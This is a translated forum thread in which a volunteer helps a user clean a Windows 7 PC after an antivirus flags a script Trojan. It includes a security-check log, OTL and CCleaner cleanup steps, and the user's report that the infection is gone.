16/12/2013 11:49:54 Detected Trojan program HEUR:Trojan.Script.Generic C:\_OTL\MovedFiles\12042013_204351\C_ProgramData\ppctrl.dat High

-----------------

Results of screen317's Security Check version 0.99.77

Windows 7 Service Pack 1 x86 (UAC is enabled)

Internet Explorer 11

``````````````Antivirus/Firewall Check:``````````````

avast! Antivirus

Antivirus up to date!

`````````Anti-malware/Other Utilities Check:`````````

CCleaner

JavaFX 2.1.1

Java 6 Update 30

Java 7 Update 45

Adobe Flash Player 11.9.900.117

Google Chrome 31.0.1650.63

````````Process Check: objlist.exe by Laurent````````

AVAST Software Avast AvastSvc.exe

AVAST Software Avast AvastUI.exe

`````````````````System Health check`````````````````

Total Fragmentation on Drive C:

````````````````````End of Log``````````````````````


Dear manoelvalerio

# Step 1 #

Once again with OTL

  • Double-click the icon [image: 3984478580_7ed4cabc45_o.gif]
  • Click the button [image: 5370056514_5fd20b1e73_m.jpg]
  • Wait...
  • When asked to restart, click OK.

# Step 2 #

<<@>> Install CCleaner

CCleaner is an excellent cleanup utility for the computer, which will help with its performance. Download it here: CCleaner

  • IMPORTANT: After installing, go to the folder where the program was installed, C:\Arquivos de programas\CCleaner, double-click the folder, right-click an empty area of that window, choose New > Folder and create a new folder; name it backups!
  • Open the program and click Run Cleaner;
  • Click the Registry button > Scan for Issues > Fix selected issues...
    Note: Don't forget to accept the backup of the fixes, and save them in the folder created above!

<<@>> Always keep your Windows up to date; keep constant watch over your firewall and antivirus, and finally, remember that the best form of prevention begins with our own habits!

Regards :D


Hello Diego, I was travelling and couldn't reply earlier.

I did all the procedures and the PC is free of that virus. Thank you!!

Manoel.
